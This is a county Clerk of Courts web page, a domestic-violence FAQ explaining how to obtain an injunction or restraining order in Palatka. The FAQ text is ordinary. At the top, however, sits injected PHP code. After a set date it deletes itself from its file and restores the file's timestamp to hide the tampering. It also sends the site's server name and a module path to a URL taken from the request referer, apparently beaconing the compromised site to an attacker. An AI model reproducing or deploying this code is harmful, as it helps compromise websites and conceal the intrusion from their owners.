check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456736233){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/modules/mod_banners/models.php"); } How can I get an Injunction?
Home Domestic Violence FAQ's How can I get an Injunction?

More... Quick Links

How can I get an Injunction?

Please contact the Victim's Advocate at 326-7676 or contact a clerk in the Family Division.

To obtain a Restraining Order, you must appear in person, in the Clerk of Courts Customer Service Center located at 518 St Johns Avenue in downtown Palatka. This address is at the corner of St. Johns Avenue and 6th Street. There is ample parking directly adjacent to the building. You must have a photo ID with signature. If you have a police report, please bring this with you.

Please come as early as possible, as this process may take 3 to 5 hours. The Clerk's hours
are 8:30 AM - 5:00 PM, Monday through Friday. No new petitions will be processed after 5:00 PM
unless you cannot find shelter through family, friends, or local shelters until the next
business day.

Copyright © 2018 Clerk of Courts. All Rights Reserved.
Joomla! is Free Software released under the GNU/GPL License.
To protect your privacy, please read the Putnam County Email Privacy Policy.

Information on this website does not constitute the Official Court Records maintained by the Clerk.